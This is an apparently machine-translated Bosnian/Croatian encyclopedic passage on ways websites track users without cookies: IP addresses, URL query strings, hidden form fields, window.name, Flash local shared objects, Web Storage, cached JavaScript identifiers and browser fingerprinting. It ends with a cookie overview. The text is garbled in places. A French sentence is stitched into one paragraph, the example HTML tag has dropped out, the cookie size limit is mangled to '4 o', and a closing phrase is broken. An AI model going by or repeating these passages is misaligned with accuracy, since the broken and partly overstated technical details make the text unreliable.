Neke operacije koje se mogu izvesti pomoću kolačića također se mogu izvesti pomoću drugih mehanizama koji zaobilaze kolačiće ili ponovo kreiraju izbrisane kolačiće, što stvara probleme s privatnošću na isti način (ili ponekad gore jer su tada nevidljivi) kao kolačići.

IP adresa

Korisnici se mogu pratiti putem IP adrese računara koji poziva stranicu. Ova tehnika je dostupna od uvođenja World Wide Weba, pošto se stranice preuzimaju, server traži IP adresu računara na kojem je pokrenut pretraživač ili proxy, ako se nijedan ne koristi. Server može pratiti ove informacije bez obzira da li se koriste kolačići ili ne. Međutim, ove adrese su obično manje pouzdane u identifikaciji korisnika od kolačića jer računare i proksije može dijeliti više korisnika, a isti računar može dobiti različitu IP adresu na svakoj radnoj sesiji (kao što je često slučaj za telefonske veze) .

Praćenje prema IP adresama može biti pouzdano u nekim situacijama, kao što su širokopojasne veze koje održavaju istu IP adresu dugo vremena, sve dok je napajanje uključeno.

Neki sistemi kao što je Tor su dizajnirani da održe anonimnost Interneta i čine praćenje putem IP adrese nemogućim ili nepraktičnim.

URL

Preciznija tehnika se zasniva na ugrađivanju informacija u URL-ove. Dio stringa upita u URL-u je jedna tehnika koja se obično koristi u ovu svrhu, ali se mogu koristiti i drugi dijelovi. I Java serverlet i mehanizmi PHP sesije koriste ovu metodu ako kolačići nisu omogućeni.

Ova metoda uključuje da web server dodaje string zahtjeve vezama na web stranici koja ih nosi kada se pošalje pregledniku. Kada korisnik prati vezu, pretraživač vraća priloženi niz upita serveru.

Nizovi upita koji se koriste u ovu svrhu i kolačići su vrlo slični, oba su informacije koje proizvoljno bira server i vraća ih pretraživač. Međutim, postoje neke razlike: kada se URL koji sadrži niz upita ponovo koristi, iste informacije se šalju serveru. Na primjer, ako su preferencije korisnika kodirane u nizu upita URL-a i korisnik pošalje tu URL adresu drugom korisniku putem e-pošte, taj će korisnik također moći koristiti te postavke.

S druge strane, kada korisnik dva puta pristupi istoj stranici, nema garancije da će isti niz upita biti korišten oba puta. Na primjer, ako korisnik prvi put dođe na stranicu sa interne stranice i drugi put dođe na istu stranicu s vanjske stranice, niz upita u odnosu na stranicu web-mjesta je obično drugačiji, dok su kolačići isti .

Ostali nedostaci nizova upita odnose se na sigurnost: čuvanje podataka koji identifikuju sesiju u nizovima upita omogućava ili pojednostavljuje napade fiksiranja sesije, napade na reference identifikatora i druge eksploatacije. Prenošenje ID-ova sesije kao HTTP kolačića je sigurnije.

Skriveno polje obrasca

Jedan oblik praćenja sesije, koji koristi ASP.NET, je korištenje web obrazaca sa skrivenim poljima. Ova tehnika je vrlo slična korištenju stringova URL upita za prenošenje informacija i ima iste prednosti i nedostatke; a ako se obrazac obrađuje metodom HTTP GET, polja zapravo postaju dio URL-a pretraživača koji će ga poslati prilikom slanja obrasca. Ali većina obrazaca se obrađuje pomoću HTTP POST-a, što uzrokuje da se informacije obrasca, uključujući skrivena polja, dodaju kao dodatni unos koji nije ni dio URL-a ni kolačića.

Ovaj pristup ima dvije prednosti iz perspektive praćenja: prvo, praćenje informacija smještenih u HTML izvornom kodu i POST unosu umjesto URL-a omogućit će prosječnom korisniku da izbjegne ovo praćenje; drugo, informacije o sesiji se ne kopiraju kada korisnik kopira URL (na primjer, da sačuva stranicu na disk ili da je pošalje putem e-pošte).

window.name

Svi uobičajeni web pretraživači mogu pohraniti prilično veliku količinu podataka (2MB do 32MB) putem JavaScripta koristeći svojstvo window.name DOM-a. Ovi podaci se mogu koristiti umjesto kolačića sesije i također se koriste na svim domenama. Tehnika se može spojiti sa JSON objektima za pohranjivanje složenog skupa varijabli sesije na strani klijenta.

Loša strana je što će svaki zasebni prozor ili kartica u početku imati prazan window.name; kada pregledate po karticama (koje otvara korisnik) to znači da pojedinačno otvorene kartice neće imati naziv prozora. Dodatno, window.name se može koristiti za praćenje posjetitelja na različitim stranicama koje mogu predstavljati zabrinutost za privatnost.

U nekim aspektima ovo može biti sigurnije od kolačića, zbog neuključenosti servera, što ga čini neranjivim na mrežni napad kolačića za njuškanje. Međutim, ako se poduzmu posebne mjere za zaštitu podataka, oni su podložni daljim napadima, jer su podaci dostupni preko drugih stranica otvorenih u istom prozoru.

HTTP autentikacija

HTTP protokol uključuje osnovne protokole za provjeru autentičnosti pristupa i sažetak provjere autentičnosti pristupa, koji dozvoljava pristup web stranici samo kada korisnik da korisničko ime i lozinku. Ako server zatraži certifikat za odobravanje pristupa web stranici, pretraživač ga traži od korisnika i kada ga jednom dobije, pretraživač ga pohranjuje i šalje u svim narednim HTTP zahtjevima. Ove informacije se mogu koristiti za praćenje korisnika.

Lokalni zajednički objekt

Ako pretraživač uključuje dodatak Adobe Flash Player, lokalni zajednički objekti mogu se koristiti u istu svrhu kao i kolačići. Mogu biti atraktivan izbor za web programere jer:

• zadana granica veličine za lokalni zajednički objekt je 100 KB;
• sigurnosne provjere su odvojene od provjera korisničkih kolačića (tako da se lokalni zajednički objekti mogu dozvoliti kada kolačići nisu).

Ova zadnja točka, koja razlikuje politiku upravljanja kolačićima od politike Adobeovih lokalnih zajedničkih objekata postavlja pitanja u vezi s upravljanjem od strane korisnika njegovim postavkama privatnosti: on mora biti svjestan da njegovo upravljanje kolačićima nema utjecaja na upravljanje lokalnim zajedničkim objektima, i obrnuto.

Još jedna kritika ovog sistema je da se može koristiti samo preko Adobe Flash Player dodatka koji je vlasnički, a ne web standard.

Postojanost na strani klijenta

Neki web pretraživači podržavaju mehanizam postojanosti zasnovan na skripti, koji omogućava stranici da lokalno pohrani informacije za kasniju upotrebu. Internet Explorer, na primer, podržava trajne informacije u istoriji pretraživača, u obeleživačima, u formatu uskladištenom u XML-u ili direktno sa veb stranicom sačuvanom na disku. Za Microsoft Internet Explorer 5 postoji metoda korisničkih podataka dostupna kroz DHTML ponašanja.

W3C je u HTML 5 uveo novi JavaScript API za skladištenje podataka na strani klijenta koji se zove Web skladište i ima za cilj da trajno zamijeni kolačiće. Sličan je kolačićima, ali sa znatno poboljšanim kapacitetom i bez pohranjivanja informacija u zaglavlju HTTP zahtjeva. API dozvoljava dvije vrste web pohrane: localstorage i sessionstorage, slično kao trajni kolačići i kolačići sesije (osim što kolačići sesije ističu kada je preglednik zatvoren dok skladištenje sesije ističe kada se kartica zatvori). Web skladište podržavaju Mozilla Firefox 3.5, Google Chrome 5, Apple Safari 4, Microsoft Internet Explorer 8 i Opera 10.50.

Drugi mehanizam se obično oslanja na keširanje pretraživača (u memoriji, a ne na osvježavanje) pomoću JavaScript programa na web stranicama. 

Na primjer, stranica može sadržavati oznaku . La première fois que la page se charge, le programme exemple.js est aussi chargé. 

U ovom trenutku, program ostaje u keš memoriji i posjećena stranica se ne učitava ponovo. Shodno tome, ako program sadrži globalnu varijablu (na primjer var id = 3243242;), ovaj identifikator ostaje važeći i može se iskoristiti drugim JavaScript kodom kada se stranica ponovo učita, ili kada se učita stranica koja povezuje program. 

Glavni nedostatak ove metode je što JavaScript globalna varijabla mora biti statična, što znači da se ne može mijenjati ili brisati kao kolačić.

otisak prsta web pretraživača

Otisak prsta pretraživača je informacija prikupljena o postavkama konfiguracije pretraživača u svrhu identifikacije. Ovi otisci prstiju se mogu koristiti za potpunu ili djelomičnu identifikaciju korisnika interneta ili uređaja čak i kada su kolačići onemogućeni.

Osnovne informacije o konfiguraciji web pretraživača već dugo prikupljaju servisi za publiku web stranice u svrhu preciznog mjerenja ljudskog web prometa i otkrivanja različitih oblika prijevare klikova. Uz pomoć skriptnih jezika na strani klijenta, prikupljanje informacija je mnogo preciznije sada moguće.

Pretvaranjem ove informacije u niz bitova dobija se otisak prsta uređaja. 2010. godine, Electronic Frontier Foundation (EFF) izmjerila je entropiju otiska prsta pretraživača na najmanje 18,1 bita, a to je bilo prije nego što je napredak u otisku prstiju na platnu dodao 5,7 bita toj entropiji.

Kolačići ukratko

Kolačići su male tekstualne datoteke koje web pretraživač pohranjuje na hard disk posjetitelja web stranice i koji se koriste (između ostalog) za snimanje informacija o posjetitelju ili njegovom putovanju kroz stranicu. Webmaster tako može prepoznati navike posjetitelja i personalizirati prezentaciju svoje stranice za svakog posjetitelja; kolačići tada omogućavaju da zapamtite koliko članaka treba prikazati na početnoj stranici ili čak zadržati vjerodajnice za prijavu za bilo koju privatnu stranu: kada se posjetitelj vrati na stranicu, više nije potrebno da upisuje svoje ime i lozinku za biti prepoznati, jer se automatski čitaju u kolačiću.

Kolačić ima ograničen životni vijek, koji je postavio dizajner stranice. Oni takođe mogu isteći na kraju sesije na sajtu, što odgovara zatvaranju pretraživača. Kolačići se naširoko koriste kako bi posjetiteljima olakšali život i pružili im relevantnije informacije. Ali posebne tehnike omogućavaju praćenje posjetitelja na nekoliko lokacija i na taj način prikupljanje i unakrsnu provjeru vrlo opsežnih informacija o njegovim navikama. Ova metoda je upotrebi kolačića stekla reputaciju kao tehnike nadzora koja narušava privatnost posjetitelja, što nažalost odgovara stvarnosti u mnogim slučajevima korištenja iz netehničkih razloga ili ne uvažavajući očekivanja korisnika. .

Kao odgovor na ove opravdane strahove, HTML 5 uvodi novi JavaScript API za skladištenje podataka na strani klijenta pod nazivom Web skladište, koji je mnogo sigurniji i sa većim kapacitetom, koji ima za cilj da zameni kolačiće.

Čuvanje kolačića

Kod nekih pretraživača kolačić se lako može uređivati, jednostavan uređivač teksta kao što je Notepad je dovoljan da ručno promijeni njegove vrijednosti.

Kolačići se spremaju različito u zavisnosti od pretraživača:

• Microsoft Internet Explorer sprema svaki kolačić u drugu datoteku;
• Mozilla Firefox sprema sve svoje kolačiće u jednu datoteku;
• opera sprema sve svoje kolačiće u jednu datoteku i šifrira ih (nemoguće ih je mijenjati osim u softverskim opcijama);
• Apple Safari sprema sve svoje kolačiće u jednu datoteku ekstenzije .plist. Izmjena je moguća, ali nije laka, osim ako ne prođete kroz softverske opcije.

Pregledači su obavezni da podržavaju a minimuma :

• 300 istovremenih kolačića;
• 4 o po kolačiću;
• 20 kolačića po hostu ili domeni.